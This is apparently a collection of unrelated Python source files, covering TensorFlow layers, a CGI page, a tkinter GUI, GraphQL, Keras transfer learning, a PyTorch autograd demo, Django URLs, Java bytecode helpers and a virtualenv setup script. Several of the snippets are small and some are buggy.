**kwargs)
@layer
def gnorm(x, group):
"""
group normalization
:param x: [N, ...., C]
:param int group: G,
:return:
"""
# def GroupNorm(x, gamma, beta, G, eps=1e−5):
# # x: input features with shape [N,C,H,W]
# # gamma, beta: scale and offset, with shape [1,C,1,1]
# # G: number of groups for GN
# N, C, H, W = x.shape
# x = tf.reshape(x, [N, G, C // G, H, W])
# mean, var = tf.nn.moments(x, [2, 3, 4], keep dims=True)
# x = (x − mean) / tf.sqrt(var + eps)
# x = tf.reshape(x, [N, C, H, W])
# return x ∗ gamma + beta
shape = list(x.dims)
if shape[0] is None:
shape[0] = -1
ch = shape[-1]
shape[-1] = ch // group
shape.append(group)
# todo : 나누어 안떨어진다면! ch // group 안떨어진다..
assert (ch // group) * group == ch
x = tf.reshape(x, shape)
x_n = lnorm(x)
# restore original shape
shape = shape[:-1]
shape[-1] = ch
x = tf.reshape(x_n, shape)
return x
# endregion
# region dense and dropout
@layer
def dropout(x, keep_prob=0.5, is_training=None, noise_shape=None, seed=None):
if keep_prob == 1.0:
return x
def _dropout():
return tf.nn.dropout(x, keep_prob, noise_shape, seed)
if is_training is None:
is_training = x.graph.is_training
else:
is_training = tf.convert_to_tensor(is_training)
return tf.cond(is_training, _dropout, lambda: x)
@layer
def dense(x, outdim, initializer=tf.glorot_uniform, bias=False, name=None):
"""
out = dense( shape=shape, init=None, paramset=None)
:param x: tensor
:param bias:
:param outdim: output_size
:param initializer:
:param name:
:return: layer | output | (output, params)
"""
if x.ndim == 4:
x = x.flat2d()
assert x.ndim == 2
outshape = not isinstance(outdim, int)
if outshape:
dim = [-1] + list(outdim)
outdim = np.prod(outdim)
shape = [x.dims[-1], outdim]
W = tf.get_weight('W', shape=shape, initializer=initializer(shape))
# W = tf.get_weight('W', initializer=initializer(shape))
out = x.dot(W)
if bias:
b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer())
out = tf.nn.bias_add(out, b)
if outshape:
# make reshape
out = out.reshape(dim)
return tf.identity(out, name=name)
# endregion
@layer
def bias(x, initializer=tf.zeros_initializer, name=None):
outdim = x.dims[-1]
b = tf.get_bias('b', shape=(outdim,), initializer=initializer())
return tf.nn.bias_add(x, b, name=name)
# region pooling
def _pool_kernel_stide(dim, kernel, stride):
if isinstance(kernel, int):
kernel = [kernel] * dim
if isinstance(stride, int):
stride = [stride] * dim
assert len(kernel) == dim and len(stride) == dim
return [1] + list(kernel) + [1], [1] + list(stride) + [1]
@layer
def maxpool(x, kernel=2, stride=None, padding='SAME'):
nd = x.ndim - 2
stride = kernel if stride is None else stride
kernel, stride = _pool_kernel_stide(nd, kernel, stride)
if nd == 2:
return tf.nn.max_pool(x, kernel, stride, padding)
elif nd == 3:
return tf.nn.max_pool3d(x, kernel, stride, padding)
else:
raise ValueError('maxpool support {0}? '.format(nd))
@layer
def maxpool_where(x, kernel, stride=None, pads=None, padding='SAME', keep=None):
# assume kernel == stride
assert stride is None and padding == 'SAME'
stride = kernel
pooled = maxpool(x, kernel, stride=stride, padding=padding)
mask = where_pooled(x, pooled, kernel, pads=pads)
if keep is None:
return pooled, mask
else:
keep.append(mask)
return pooled
@layer
def where_pooled(x, pooled, kernel=None, pads=None):
"""
return mask
:param x:
:param pooled:
:param kernel:
:param pads:
:return:
"""
# todo : add 3d support
assert x.ndim == 4
import math
if kernel is None:
kernel = [math.ceil(float(d) / float(p)) for d, p in zip(x.dims, pooled.zip)]
repeat = pooled.repeats(kernel, axis=[1, 2])
elif isinstance(kernel, (tuple, list)):
repeat = pooled.repeats(kernel, axis=[1, 2])
else:
repeat = pooled.repeats([kernel, kernel], axis=[1, 2])
if pads is not None:
repeat = repeat.pad(pads, axis=[1, 2])
# crop need
dim = x.dims
sameshaped = repeat[:dim[0], :dim[1], :dim[2], :dim[3]]
mask = tf.equal(x, sameshaped).to_float()
return mask
@layer
def unpool_where(x, mask, kernel, padding='SAME'):
"""
unpool with maxpool mask
:param x:
:param mask:
:param kernel:
:param padding:
:return:
"""
# really not a option yet
# assert stride is None
assert padding == 'SAME'
nd = x.ndim
if nd == 4:
if isinstance(kernel, int):
kernel = (kernel, kernel)
unpooled = x.repeats(kernel, axis=(1, 2))
elif nd == 5:
if isinstance(kernel, int):
kernel = (kernel, kernel, kernel)
unpooled = x.repeats(kernel, axis=(1, 2, 3))
else:
raise ValueError('unsupported nd {0}'.format(nd))
return unpooled * mask
@layer
def unpool_zero(x, kernel):
""" upsample by inserting zeros.. """
if not isinstance(kernel, (list, tuple)) and isinstance(kernel, int):
kernel = [kernel] * (x.ndim - 2)
out = x
for axis in range(1, x.ndim-2):
out = out.insert_zero(kernel[axis-1], axis=axis)
return out
@layer
def unpool_repeat(x, kernel):
""" upsample by repeating"""
if not isinstance(kernel, (list, tuple)) and isinstance(kernel, int):
kernel = [kernel] * (x.ndim - 2)
return x.repeats(kernel, axis=list(range(1, x.ndim-2)))
@layer
def avgpool(x, kernel, stride, padding='SAME'):
nd = x.ndim - 2
kernel, stride = _pool_kernel_stide(nd, kernel, stride)
if nd == 2:
return tf.nn.avg_pool(x, kernel, stride, padding)
elif nd == 3:
return tf.nn.avg_pool3d(x, kernel, stride, padding)
else:
raise ValueError('avgpool support {0}? '.format(nd))
@layer
def gpool(x, keepdims=True):
"""
global_avgpool
:param x:
:param keepdims:
:return:
"""
# http://arxiv.org/pdf/1312.4400.pdf
axis = list(range(1, x.ndim-1))
return x.mean(axis=axis, keepdims=keepdims)
# endregion
# region atrous convolution
# def atrous2d(x, )
def _atrous1d(x, kernel, rate, padding='SAME'):
"""
cf https://www.tensorflow.org/versions/r0.11/api_docs/python/nn.html#atrous_conv2d
:param x: [batch, time, channel]
:param kernel: [1, 1, inchannel, outchannel]
:param rate: dialtion rate
:param padding: 'same' or 'valid'
:param bias:
:return:
"""
# from ireshape import time_to_batch, batch_to_time
# atrous_conv1d implementation
if rate == 1:
# same to normal conv1d
out = tf.nn.conv1d(x, kernel, stride=(1, 1, 1), padding=padding)
return out
# if 'same'
if padding == 'SAME':
filter_width = kernel.dims[0]
# temporal dimension of the filter and the upsampled filter in which we
# introduce (rate - 1) zeros between consecutive filter values.
filter_width_up = filter_width + (filter_width - 1) * (rate - 1)
pad = filter_width_up - 1
# When pad is odd, we pad more to right
pad_left = pad // 2
pad_right = pad - pad_left
elif padding == 'VALID':
pad_left = 0
pad_right = 0
else:
raise ValueError('Invalid padding')
in_width = x.dims[1] + pad_left + pad_right
# more padding so that rate divides the width of the input
pad_right_extra = (rate - in_width % rate) % rate
pads = [(0, 0), (pad_left, pad_right + pad_right_extra), (0, 0)]
out = x.time_to_batch(rate, pads)
out = tf.nn.conv1d(out, kernel, stride=(1, 1, 1), padding='VALID')
# if bias is not None:
# bias=bias,
crops = [(0, 0), (0, pad_right_extra), (0, 0)]
# temporary test this
out = out.batch_to_time(rate, crops)
return out
@layer
def atrous(x, outdim, kernel, rate, pad=0, padding='SAME',
initializer=tf.he_uniform, bias=None, **kwargs):
# todo rate per axis?
assert isinstance(pad, int)
nd = x.ndim - 2
if pad:
pads = [(0, 0)] + [(pad, pad)] * nd + [(0, 0)]
x = tf.pad(x, pads, mode='CONSTANT')
kernel = _kernel_shape(nd, kernel, x.dims[-1], outdim)
W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel), **kwargs)
if nd == 1:
out = _atrous1d(x, W, rate, padding=padding)
elif nd == 2:
out = tf.nn.atrous_conv2d(x, W, rate, padding)
else:
raise NotImplementedError('not implementd for ndim [{0}]'.format(nd))
if bias is not None:
b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
out = tf.nn.bias_add(out, b)
return out
# endregion
# region deconv
def _deconv_outshape(nd, inshape, outdim, kernel, stride, padding, extra_shape=0):
# conv2d case (filter = kernel)
# output = (input + stride - 1)//stride # SAME ? filter?
# output = (input + stride - filter)//stride # VALID
# 위 식 inverse
# output = (input * stride) - stride + 1 + extra
# todo : through check need ??
# => max일경우 (output - 1) * stride + 1 - stride
# output = (input * stride) - stride + filter + extra # VALID
# 단, 0 <= extra < stride
if isinstance(kernel, int):
kernel = [kernel] * nd
if isinstance(stride, int):
stride = [stride] * nd
if extra_shape is None:
extra_shape = 0
if isinstance(extra_shape, int):
extra_shape = [extra_shape] * nd
outshape = [None] * nd
if padding == 'SAME':
for i in range(0, nd):
outshape[i] = inshape[i+1] * stride[i] + extra_shape[0]
elif padding == 'VALID':
# assert -stride[0] < extra_shape[0] < stride[0]
# assert -stride[1] < extra_shape[1] < stride[1]
for i in range(0, nd):
outshape[i] = (inshape[i+1] * stride[i]) - stride[i] + kernel[i] + extra_shape[i]
else:
raise ValueError('unknown padding option {0}'.format(padding))
return [inshape[0]] + outshape + [outdim]
@layer
def deconv(x, outdim, kernel, stride=1, padding='SAME',
initializer=tf.he_uniform, bias=False, extra=None, **kwargs):
nd = x.ndim - 2
out_shape = _deconv_outshape(nd, x.dims, outdim, kernel, stride, padding, extra)
oshape = tf.TensorShape(out_shape)
if out_shape[0] is None:
out_shape[0] = tf.shape(x)[0]
out_shape = tf.stack(out_shape)
kernel_shape = _kernel_shape(nd, kernel, outdim, x.dims[-1]) # swap in and out channel
stride = _stride_shape(nd, stride) # stride
W = tf.get_weight('W', shape=kernel_shape, initializer=initializer(kernel_shape))
if nd == 2:
out = tf.nn.conv2d_transpose(x, W, out_shape, strides=stride, padding=padding)
elif nd == 3:
out = tf.nn.conv3d_transpose(x, W, out_shape, strides=stride, padding=padding)
else:
raise NotImplementedError('not implementd for ndim [{0}]'.format(nd))
if bias:
b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
out = tf.nn.bias_add(out, b)
out.set_shape(oshape)
return out
# endregion
# region depthwise
@layer
def dwconv(x, kernel, multiplier=1, stride=1, pad=0, padding='SAME',
initializer=tf.he_uniform, bias=False, **kwargs):
if pad:
pads = [(0, 0), (pad, pad), (pad, pad), (0, 0)]
x = tf.pad(x, pads, mode='CONSTANT')
kernel = _kernel_shape(2, kernel, x.dims[-1], multiplier)
stride = _stride_shape(2, stride)
W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel), **kwargs)
out = tf.nn.depthwise_conv2d(x, W, stride, padding)
if bias:
outdim = kernel[2] * multiplier
b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer(), **kwargs)
out = tf.nn.bias_add(out, b)
return out
# endregion
# region subpixel
@layer
def subpixel(x, kernel, factor=2, stride=1, pad=0, padding='SAME',
initializer=tf.he_uniform, bias=False, **kwargs):
from .ireshape import channel_to_space
assert x.ndim == 4 # implemented for 4D tensor
indim = x.dims[-1]
outdim = indim * factor * factor
kernel = _kernel_shape(2, kernel, indim, outdim)
stride = _stride_shape(2, stride)
W = tf.get_weight('W', shape=kernel, initializer=initializer(kernel))
out = tf.nn.conv2d(x, W, stride, padding=padding)
if bias:
b = tf.get_bias('b', shape=(outdim,), initializer=tf.zeros_initializer())
out = tf.nn.bias_add(out, b)
# periodic shuffle
out = channel_to_space(out, factor)
return out
# endregion
# region activation
@layer
def leaky(x, slope=0.01, name=None):
"""
leaky_relu
see also pleaky
:param x:
:param slope: 0.01 default
:return:
"""
return tf.maximum(x, x*slope, name=name)
@layer
def pleaky(x):
"""
parametric leakyrelu
:param x:
:return:
"""
alpha = tf.get_bias('alpha', shape=(), initializer=tf.constant_initializer(0.01))
return tf.maximum(x, x * alpha)
# endregion
# region resize images
@layer
def sizeup(x, factor=(2, 2), extras=(0, 0), method=ResizeMethod.NEAREST_NEIGHBOR, align_corners=False):
inshape = x.dims
if isinstance(factor, int):
factor = (factor, factor)
if isinstance(extras, int):
extras = (extras, extras)
hw = [inshape[1] * factor[0] + extras[0], inshape[2] * factor[1] + extras[1]]
return tf.image.resize_images(x, hw, method=method, align_corners=align_corners)
@layer
def sizedown(x, factors=(2, 2), extras=(0, 0), method=ResizeMethod.NEAREST_NEIGHBOR, align_corners=False):
inshape = x.dims
if isinstance(factors, int):
factors = (factors, factors)
if isinstance(extras, int):
extras = (extras, extras)
hw = [inshape[1] // factors[0] + extras[0], inshape[2] // factors[1] + extras[1]]
return tf.image.resize_images(x, hw, method=method, align_corners=align_corners)
# endregion
# region collecting utils
@layer
def keep(t, keepto, collection=None):
"""
append to list and return t as is
:param t: tensor
:param keepto: list
:return:
"""
if collection is not None:
tf.add_to_collection(collection, t)
keepto.append(t)
return t
@layer
def collect(t, collection='activation'):
"""
append to list and return t as is
:param t: tensor
:param collection:
:return:
"""
tf.add_to_collection(collection, t)
return t
# endregion
# region util
@layer
def iname(t, name):
return tf.identity(t, name=name)
# endregion
|
5,132 | b5fee01582a28085983c56b9c266ef7fd5c3c927 | #!/usr/bin/env python
import cgitb
import cgi
import pymysql
form = cgi.FieldStorage()
c.execute("SELECT * FROM example")
recs = c.fetchall()
records1 = """
<body>
<table>
<tbody>
<tr>
<th>Full Name</th>
<th>Average Score</th>
</tr>"""
records_dyn = [
f"<tr><td>{name}</td><td>{avg}</td></tr>" for recs[1], recs[2] in recs]
records2 = """
<form method="POST" action="index.py">
<input type="submit" value="Go Back">
</form>
</body>
</table>
</body>
</html>"""
print("Content-Type:text/html; charset=utf-8")
print()
for i in records1.split("\n"):
print(i)
for i in records_dyn:
print(i)
for i in records1.split("\n"):
print(i)
|
5,133 | 1482c8276f9cfc912293356d04e08307edf6d367 | import tkinter as tk
import cnt_script as sW
import key_script as kW
import text_script as tW
class MainWindow(tk.Tk):
def __init__(self):
super().__init__()
self.title("Main Window")
self.geometry("600x400+30+30")
tk.Button(self, text = "Count Tags", command = self.new_tags).pack()
tk.Button(self, text="Count keywords",command=self.new_keys).pack()
tk.Button(self, text="Count text",command=self.new_text).pack()
self._second_window = None
self._third_window=None
self._text_window=None
def new_tags(self):
# This prevents multiple clicks opening multiple windows
if self._second_window is not None:
return
self._second_window = sW.SubWindow(self)
def new_keys(self):
# This prevents multiple clicks opening multiple windows
if self._third_window is not None:
return
self._third_window = kW.SubWindow(self)
def new_text(self):
# This prevents multiple clicks opening multiple windows
if self._text_window is not None:
return
self._text_window = tW.SubWindow(self)
def close(self):
# Destory the 2nd window and reset the value to None
if self._second_window is not None:
self._second_window.destroy()
self._second_window = None
def close_key(self):
# Destory the 2nd window and reset the value to None
if self._third_window is not None:
self._third_window.destroy()
self._third_window = None
def close_text(self):
# Destory the 2nd window and reset the value to None
if self._text_window is not None:
self._text_window.destroy()
self._text_window = None
if __name__ == '__main__':
window = MainWindow()
window.mainloop() |
5,134 | 0992297ffc19b1bc4dc3d5e8a75307009c837032 | import strawberry as stb
from app.crud import cruduser
from app.db import get_session
@stb.type
class Query:
@stb.field
async def ReadUser(self, info, username: str):
ses = await get_session()
fields = info.field_nodes[0].selection_set.selections[0]
return await cruduser.get_user(ses, username, fields)
|
5,135 | 0dea8675d8050a91c284a13bcbce6fd0943b604e | import pandas as pd
import numpy as np
class LabeledArray:
@staticmethod
def get_label_for_indexes_upto(input_data, input_label, input_index):
df_input_data = pd.DataFrame(input_data)
df_labels = pd.DataFrame(input_label)
df_data_labels = pd.concat([df_input_data, df_labels], axis=1)
df_data_labels.columns = ['input_data', 'input_label']
df_data_labels.sort_values(by=['input_data'], ascending=True, inplace=True)
return np.array(df_data_labels.iloc[:, 1].head(input_index))
|
5,136 | 043ea0efd490522de4f6ee4913c8d66029b34ff5 | # =============================================================================
# Created By : Mohsen Malmir
# Created Date: Fri Nov 09 8:10 PM EST 2018
# Purpose : this file implements the gui handling to interact with emulators
# =============================================================================
from AppKit import NSWorkspace,NSApplicationActivateIgnoringOtherApps
from Quartz import CGWindowListCopyWindowInfo,kCGWindowListOptionOnScreenOnly
from Quartz import kCGWindowListExcludeDesktopElements,kCGNullWindowID
# this is a list of pairs of (emulator, game) that is supported to interact with
supported_emus = ["OpenEmu"]
supported_games = ["Mortal Kombat 3"]
def activate_emu():
"""
This function scans all the open windows and returns a handle to the first known
and supported emulator-game pair.
Args:
None
Returns:
"""
# get a list of all open windows
windows = CGWindowListCopyWindowInfo(kCGWindowListOptionOnScreenOnly&kCGWindowListExcludeDesktopElements,kCGNullWindowID)
winname_list = [w.get("kCGWindowName", u"Unknown") for w in windows]
winrect_list = [w["kCGWindowBounds"] for w in windows]
# first find the Emulator
ws = NSWorkspace.sharedWorkspace()
runningApps = ws.runningApplications()
# the running processes are checked by their localized name, e.g. "OpenEmu"
ra_names = [ra.localizedName() for ra in runningApps]
for ii, emu in enumerate(supported_emus):
if emu in ra_names: # if a supported emu is found, check for corresponding games
if supported_games[ii] in winname_list: # we foudn a supported game of the target emu
# activate the emu window
emu_idx = ra_names.index(emu)
runningApps[emu_idx].activateWithOptions_(NSApplicationActivateIgnoringOtherApps)
# get the window coordinates
idx = winname_list.index(supported_games[ii])
rect = winrect_list[idx]
rect = [rect.get("X"),rect.get("Y"),rect.get("Width"),rect.get("Height")]
rect = list(map(int,rect))
return rect, emu, supported_games[ii]
return None
if __name__ == "__main__":
print(activate_emu())
|
5,137 | 7435aa6cd4eec5582be9f4a1dd75b0dfcadc4409 | from flask_socketio import SocketIO
socket = SocketIO()
@socket.on('test')
def on_test(msg):
print 'got message'
|
5,138 | 47cf3045f2fa0f69759e09b1599e4afe953c06d8 | INITIAL_B = 0.15062677711161448
B_FACTOR = 5.0
INITIAL_GE = 0.22581915788215678
GE_BOUNDS = [1.0 / 10.0, 1.0 / 4.0]
FIXED_P = 0.9401234488501574
INITIAL_GU = 0.2145066414796447
GU_BOUNDS = [1.0 / 15.0, 1.0 / 2.0]
INITIAL_GI = 0.19235137989123863
GI_BOUNDS = [1.0 / 15.0, 1.0 / 5.0]
INITIAL_GH = 0.044937075878220795
GH_BOUNDS = [1.0 / 20.0, 1.0 / 5.0]
INITIAL_MU = 0.002840331041978459
MU_BOUNDS = [0.0, 0.1]
INITIAL_PARAMETERS = [
INITIAL_B,
INITIAL_GE,
FIXED_P,
INITIAL_GU,
INITIAL_GI,
INITIAL_GH,
None, # rH
INITIAL_MU,
]
E_FACTOR = 5.0
U_FACTOR = 5.0
I_FACTOR = 5.0
|
5,139 | 461b2de86907047df53c3857c6b0397e77de3fcd | import keras
from keras.applications import VGG16
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Model
import matplotlib.pyplot as plt
from keras.callbacks import History
import numpy as np
import os
import cPickle as pickle
import scipy
from scipy import spatial
def getModel( output_dim ):
'''
* output_dim: the number of classes (int)
* return: compiled model (keras.engine.training.Model)
'''
vgg_model = VGG16( weights='imagenet', include_top=True )
vgg_out = vgg_model.layers[-2].output #Last FC layer's output
#Create softmax layer taking input as vgg_out
regression_layer = keras.layers.core.Dense(output_dim,
init='lecun_uniform')(vgg_out)
#Create new transfer learning model
tl_model = Model( input=vgg_model.input, output=regression_layer)
#Freeze all layers of VGG16 and Compile the model
for layers in vgg_model.layers:
layers.trainable = False;
tl_model.compile(optimizer='Nadam',
loss='cosine_proximity')
#Confirm the model is appropriate
tl_model.summary()
return tl_model
if __name__ == '__main__':
#Output dim for your dataset
output_dim = 300 #For word2vec output
# Training parameters
batchSize = 100
numEpochs = 15
tl_model = getModel( output_dim )
trainClass = np.load('caltech250TrainClass.npy')
trainLabel = np.load('caltech250TrainWordvec.npy')
valData = np.load('caltech250ValData.npy')
valClass = np.load('caltech250ValClass.npy')
valLabel = np.load('caltech250ValWordvec.npy')
# Input data generator
train_datagen = ImageDataGenerator(
featurewise_center = True)
train_generator = train_datagen.flow_from_directory(
'resizedCaltech250Train',
target_size= (224,224),
class_mode = 'sparse',
batch_size = batchSize)
test_datagen = ImageDataGenerator(
featurewise_center = True)
test_generator = test_datagen.flow_from_directory(
'resizedCaltech250Val',
target_size=(224,224),
class_mode = 'sparse',
batch_size = batchSize)
train_datagen.fit(valData)
test_datagen.fit(valData)
caltechDict = pickle.load(open('caltech256Dict.pkl'))
epoch = 0
numImg = 0
numImgsPerEpoch = 23954
classLabels = os.listdir('./resizedCaltech250Train/')
classTargets = [caltechDict[key] for key in caltechDict]
classLabels = [key for key in caltechDict]
ind = np.argsort(classLabels)
classLabels.sort()
classTargets = [classTargets[i] for i in ind]
print("Epoch 0")
batchCount = 0
for batch in train_generator:
imgs = batch[0]
labels = batch[1]
wordEmbed = [np.asarray(caltechDict[classLabels[classInd]]) for classInd in labels]
tl_model.train_on_batch(imgs,np.asarray(wordEmbed))
#print(batchCount)
numImg += batchSize
batchCount += 1
# Epoch checkpoint
if numImg > numImgsPerEpoch:
tl_model.save('test.hd5')
epoch += 1
numImg = 0
print('Epoch: ' + str(epoch))
# Calculate validation loss after each epoch
loss = 0
imgCount = 0
numbatch = 1
print("Calculating validation loss")
# Get validation set labels from cosine similarity
predictions = tl_model.predict(valData, batch_size = 100, verbose = 1)
#print('Validation Loss: ' + str(spatial.distance.cosine(predictions,valLabel)))
valLoss = [spatial.distance.cosine(predictions[j,:],valLabel[j,:]) for j in range(valClass.shape[0])]
print('Validation Loss: ' + str(sum(valLoss)/valClass.shape[0]))
dist = [[spatial.distance.cosine(x,y) for y in classTargets] for x in predictions]
ind = np.argmin(dist,1)
predictedLabel = [classLabels[x] for x in ind]
# Calculate error rate
correct = 0
for i,label in enumerate(valClass):
if valClass[i] == predictedLabel[i]:
correct += 1
print('Validation Accuracy: ' + str(float(correct)/valClass.shape[0]))
print("Calculating Training Accuracy and Loss")
t_preds = np.array([])
t_targets = np.array([])
t_numImg = 0
t_batch_count = 1
for t_batch in train_generator:
#print(' train batch ' + str(t_batch_count))
t_numImg += batchSize
t_imgs = t_batch[0]
t_batch_preds = tl_model.predict_on_batch(t_imgs)
t_batch_targets = t_batch[1]
#print(classLabels[t_batch_targets[0]])
t_preds = np.vstack([t_preds, t_batch_preds]) if t_preds.size else t_batch_preds
t_targets = np.hstack([t_targets, t_batch_targets]) if t_targets.size else t_batch_targets
#print(' size ' + str(np.shape(t_targets)))
t_batch_count += 1
if t_numImg >= numImgsPerEpoch:
break
dist = [[spatial.distance.cosine(x,y) for y in classTargets] for x in t_preds]
ind = np.argmin(dist,1)
predictedLabel = [classLabels[x] for x in ind]
# Calculate Training Accuracy
correct = 0
#for i,label in enumerate(trainClass):
for i in range(numImgsPerEpoch):
#if trainClass[i] == predictedLabel[i]:
if classLabels[t_targets[i]] == predictedLabel[i]:
correct += 1
print('Training Accuracy: ' + str(float(correct)/trainClass.shape[0]))
trainLoss = [spatial.distance.cosine(t_preds[sample,:],trainLabel[sample,:]) for sample in range(trainClass.shape[0])]
print('Training Loss: ' + str(sum(trainLoss)/trainClass.shape[0]))
'''
for valBatch in test_generator:
imgs = valBatch[0]
labels = valBatch[1]
wordEmbed = [np.asarray(caltechDict[classLabels[classInd]]) for classInd in labels]
loss += np.sum(tl_model.test_on_batch(imgs,np.asarray(wordEmbed)))
imgCount += batchSize
if imgCount > 1:
print("Validation: " + str(loss/imgCount))
loss = 0
imgCount = 0
break
'''
if epoch >= numEpochs:
break
#Test the model
'''
plt.plot(history.history['acc'])
plt.show()
plt.figure()
plt.plot(history.history['loss'])
plt.show()
plt.figure()
plt.plot(history.history['val_acc'])
plt.show()
plt.figure()
plt.plot(history.history['val_loss'])
plt.show()
epoch = 0
numImg = 0
classLabels = os.listdir('C:/Users/xsaardo/Desktop/Caltech97Train/')
for batch in train_generator:
imgs = batch[0]
labels = batch[1]
print(batch[0].shape)
print(classLabels[np.argmax(batch[1][0,:])])
img = np.reshape(batch[0][0,:,:,:],(224,224,3)).astype('uint8')
print(img.shape)
plt.imshow(img)
plt.show()
break;
numImg += batchSize
if numImg > numImgsPerEpoch:
epoch += 1
if epoch > numEpochs:
break
'''
|
5,140 | ba1648143d49110a163da02e60fb0fd024a10b79 | from __future__ import print_function # Should comes first than torch
import torch
from torch.autograd import Variable
##
## Autograd.Variable is the central class of the package. It wraps a Tensor, and supports nearly all of operations defined on it. Once you finish your computation you can call .backward() and have all the gradients computed automatically!!!
## from: http://pytorch.org/tutorials/beginner/blitz/autograd_tutorial.html
## ------------- Simple Variable ------------- ##
print("# ------------- Simple Variable ------------- #")
x_tensor = torch.ones(2, 2)
x = Variable(x_tensor, requires_grad=True)
print(x)
y = x + 2
print(y)
# y was created as a result of an operation, so it has a grad_fn.
print (y.grad_fn)
z = y * y * 3 # z = 3*y^2
out = z.mean()
print("z = y * y * 3\n", z, out)
## ------------- Simple Gradients ------------- ##
print("# ------------- Simple Gradients ------------- #")
# out.backward() is equivalent to doing out.backward(torch.Tensor([1.0]))
out.backward()
print("dout/dx \n", x.grad) # gradient of z = 3(x+2)^2, dout/dx = 3/2(x+2), x=1
## ------------- Crazy Gradients ------------- ##
print("# ------------- Crazy Gradients ------------- #")
x = torch.randn(3)
x = Variable(x, requires_grad=True)
y = x * 2
while y.data.norm() < 1000:
y = y * 2
print("y \n", y)
gradients = torch.FloatTensor([0.1, 1.0, 0.0001])
y.backward(gradients)
print("dy/dx \n", x.grad)
|
5,141 | 7b527f9ec66ddf35f3395d78c857c021975402c7 | from django.urls import path
from main.views import IndexView, BuiltinsView, CustomView
app_name = 'main'
urlpatterns = [
path('', IndexView.as_view(), name='index'),
path('builtins/', BuiltinsView.as_view(), name='builtins'),
path('custom/', CustomView.as_view(), name='custom')
]
|
5,142 | 67e0536dc9f38ab82fe30e715599fed93c5425a5 | from ...java import opcodes as JavaOpcodes
from .primitives import ICONST_val
##########################################################################
# Common Java operations
##########################################################################
class New:
def __init__(self, classname):
self.classname = classname
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW(self.classname),
JavaOpcodes.DUP()
)
class Init:
def __init__(self, classname, *args):
self.classname = classname
self.args = args
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKESPECIAL(
self.classname,
'<init>',
args=self.args,
returns='V'
),
)
class Yield:
def __init__(self, yield_point):
self.yield_point = yield_point
def process(self, context):
context.add_opcodes(
ICONST_val(self.yield_point),
JavaOpcodes.INVOKEVIRTUAL(
'org/python/types/Generator',
'yield',
args=['Ljava/util/Map;', 'I'],
returns='V'
),
# "yield" by returning from the generator method.
JavaOpcodes.ARETURN()
)
##########################################################################
# Java types and their operations
##########################################################################
class Array:
def __init__(self, size, classname='org/python/Object', fill=None):
self.size = size
self.classname = classname
self.fill = fill
def process(self, context):
context.add_opcodes(
ICONST_val(self.size),
JavaOpcodes.ANEWARRAY(self.classname),
)
if self.fill:
for i in range(self.size):
context.add_opcodes(
JavaOpcodes.DUP(),
ICONST_val(i),
self.fill,
JavaOpcodes.AASTORE(),
)
class List:
def __init__(self, size=None):
self.size = size
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW('java/util/ArrayList'),
JavaOpcodes.DUP(),
)
if self.size:
context.add_opcodes(
ICONST_val(self.size),
Init('java/util/ArrayList', 'I')
)
else:
context.add_opcodes(
Init('java/util/ArrayList')
)
class add:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/List',
'add',
args=['Ljava/lang/Object;'],
returns='Z'
),
JavaOpcodes.POP(),
)
class Map:
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW('java/util/HashMap'),
JavaOpcodes.DUP(),
Init('java/util/HashMap')
)
class get:
def __init__(self, key):
self.key = key
def process(self, context):
context.add_opcodes(
JavaOpcodes.LDC_W(self.key),
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'get',
args=['Ljava/lang/Object;'],
returns='Ljava/lang/Object;'
)
)
class put:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'put',
args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],
returns='Ljava/lang/Object;'
),
JavaOpcodes.POP()
)
class putAll:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'putAll',
args=['Ljava/util/Map;'],
returns='V'
),
)
class Class:
class forName:
def __init__(self, classname):
self.classname = classname
def process(self, context):
context.add_opcodes(
JavaOpcodes.LDC_W(self.classname),
JavaOpcodes.INVOKESTATIC(
'java/lang/Class',
'forName',
args=['Ljava/lang/String;'],
returns='Ljava/lang/Class;'
),
)
class THROW:
# Raise an exception of given type with given arguments
# Example:
# THROW(
# 'org/python/exceptions/AttributeError',
# ['Ljava/lang/String;', JavaOpcodes.LDC_W("Invalid attribute")],
# )
def __init__(self, exception_class, *exception_args):
self.exception_class = exception_class
self.exc_arg_types = [e[0] for e in exception_args]
self.exc_arg_values = [e[1] for e in exception_args]
def process(self, context):
context.add_opcodes(
New(self.exception_class),
*self.exc_arg_values
)
context.add_opcodes(
Init(self.exception_class, *self.exc_arg_types),
JavaOpcodes.ATHROW(),
)
|
5,143 | 3f41cb1acbbb1a397ae1288bca1cbcd27c0d3f33 | # -*- coding: utf-8 -*-
import os
import subprocess
import virtualenv
from templateserver import __version__ as version
DEFAULT_TEMPLATE_DIR = 'templates'
DEFAULT_MEDIA_DIR = 'media'
DEFAULT_STATIC_DIR = 'static'
DEFAULT_ENV_DIR = '.env'
DEFAULT_RUNSERVER_PATH = 'runserver.py'
RUNSERVER_TEMPLATE = os.path.abspath(os.path.join(os.path.dirname(__file__), 'runserver_template.py'))
def install_virtualenv(envdir):
if not os.path.exists(envdir):
virtualenv.create_environment(envdir, False)
def install_django(envdir, version):
pip = os.path.join(envdir, 'bin', 'pip')
subprocess.call([pip, 'install', 'django==%s' % version])
def install_runserver(envdir, runserverpath, templatedir, mediadir, staticdir):
python = os.path.join(envdir, 'bin', 'python')
with open(RUNSERVER_TEMPLATE) as fobj:
template = fobj.read()
runserver = template.replace(
'$PYTHON$', python
).replace(
'$MEDIADIR$', mediadir
).replace(
'$STATICDIR$', staticdir
).replace(
'$TEMPLATEDIR$', templatedir
).replace(
'$VERSION$', version
)
with open(runserverpath, 'w') as fobj:
fobj.write(runserver)
